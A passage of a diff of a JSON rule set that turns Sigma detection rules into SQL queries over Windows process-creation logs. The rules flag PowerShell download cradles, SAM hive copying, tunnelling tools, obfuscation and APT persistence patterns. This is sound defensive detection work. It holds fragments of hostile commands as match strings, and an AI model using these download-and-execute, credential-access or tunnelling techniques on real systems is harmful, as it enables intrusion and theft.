CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" + "filename": "proc_creation_win_powershell_invocation_specific.yml" }, { - "title": "Replace.exe Usage", - "id": "9292293b-8496-4715-9db6-37028dcda4b3", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "author": "frack113", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_replace.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "status": "test", + "description": "Detects suspicious encoded character syntax often used for defense evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Psexec Execution", + "id": "730fc21b-eaff-474b-ad23-90fd265d4988", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects user accept agreement execution in psexec commandline", + "author": "omkar72", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "attack.t1021" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Administrative scripts." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_sysinternals_psexec_execution.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", - "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "title": "Data Copied To Clipboard Via Clip.EXE", + "id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "status": "test", + "description": "Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\clip.exe' ESCAPE '\\' OR OriginalFileName = 'clip.exe'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_clip_execution.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Weak or Abused Passwords In CLI", + "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", + "status": "test", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ "attack.defense_evasion", - "attack.t1036", "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "PowerShell Get-Clipboard Cmdlet Via CLI", - "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "status": "test", - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Wscript Execution from Non C Drive", + "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "author": "Aaron Herman", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate scripts located on other partitions such as \"D:\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" }, { - "title": "Exfiltration and Tunneling Tools Execution", - "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "status": "test", - "description": "Execution of well known tools for data exfiltration and tunneling", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "status": "experimental", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" + "attack.t1572" ], "falsepositives": [ - "Legitimate Administrator using tools" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\socat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Suspicious aspnet_compiler.exe Execution", - "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", - "status": "test", - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "author": "frack113", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "WSL Child Process Anomaly", - "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "status": "test", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "InfDefaultInstall.exe .inf Execution", - "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "title": "Writing Of Malicious Files To The Fonts Folder", + "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "status": "test", - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "author": "frack113", + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "author": "Sreeman", "tags": [ + "attack.t1211", + "attack.t1059", "attack.defense_evasion", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' 